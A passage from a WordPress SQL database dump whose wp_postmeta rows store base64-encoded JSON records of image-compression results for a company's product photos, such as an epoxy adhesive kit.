WRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtNzY4eDU4Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUxNzUsImlkIjoxMTQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtMTYwMHgxMjIwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEyMjAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0xNjAweDEyMjAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0xNjAweDEyMjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MTc4LCJpZCI6MTE0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUxODEsImlkIjoxMTQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTE4MywiaWQiOjExNDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MTg2LCJpZCI6MTE0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUxODgsImlkIjoxMTQ4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MTkxLCJpZCI6MTE0OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTE5MywiaWQiOjExNDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUxOTYsImlkIjoxMTQ4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MTk4LCJpZCI6MTE0OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTIwMCwiaWQiOjExNDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUyMDMsImlkIjoxMTQ4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29720, 1142, 'wpfc_optimisation_reduction', '16321'); 
INSERT INTO `wp_postmeta` VALUES (29721, 1142, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZpbmlzaGxpbmUuanBnIiwid2lkdGgiOjYwMDAsImhlaWdodCI6NDAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NTIwOCwiaWQiOiIxMTQyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjgxMywidGltZSI6MTQ4MzU3NTIxMSwiaWQiOjExNDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNjk5LCJ0aW1lIjoxNDgzNTc1MjE2LCJpZCI6MTE0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE1NzIsInRpbWUiOjE0ODM1NzUyMjAsImlkIjoxMTQyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmluaXNobGluZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozNDgxLCJ0aW1lIjoxNDgzNTc1MjI1LCJpZCI6MTE0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY1MywidGltZSI6MTQ4MzU3NTIyOSwiaWQiOjExNDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzAsInRpbWUiOjE0ODM1NzUyMzIsImlkIjoxMTQyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmluaXNobGluZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTU2LCJ0aW1lIjoxNDgzNTc1MjM2LCJpZCI6MTE0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExOTksInRpbWUiOjE0ODM1NzUyNDAsImlkIjoxMTQyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1NDUsInRpbWUiOjE0ODM1NzUyNDQsImlkIjoxMTQyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo2MzYsInRpbWUiOjE0ODM1NzUyNDcsImlkIjoxMTQyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo4MDIsInRpbWUiOjE0ODM1NzUyNTAsImlkIjoxMTQyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxMDUyLCJ0aW1lIjoxNDgzNTc1MjU0LCJpZCI6MTE0Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRmluaXNobGluZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTE5NywidGltZSI6MTQ4MzU3NTI1OCwiaWQiOjExNDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9GaW5pc2hsaW5lLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRmluaXNobGluZS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0ZpbmlzaGxpbmUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjE1ODYsInRpbWUiOjE0ODM1NzUyNjIsImlkIjoxMTQyfV0='); 
INSERT INTO `wp_postmeta` VALUES (29722, 1141, 'wpfc_optimisation_reduction', '2203169'); 
INSERT INTO `wp_postmeta` VALUES (29723, 1141, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVFJJQk9TeXMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9UUklCT1N5cy5qcGciLCJ3aWR0aCI6MzAwMCwiaGVpZ2h0IjoyMDAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVFJJQk9TeXMuanBnIiwicmVkdWN0aW9uIjoyMjAzMTU1LCJ0aW1lIjoxNDgzNTc1Mj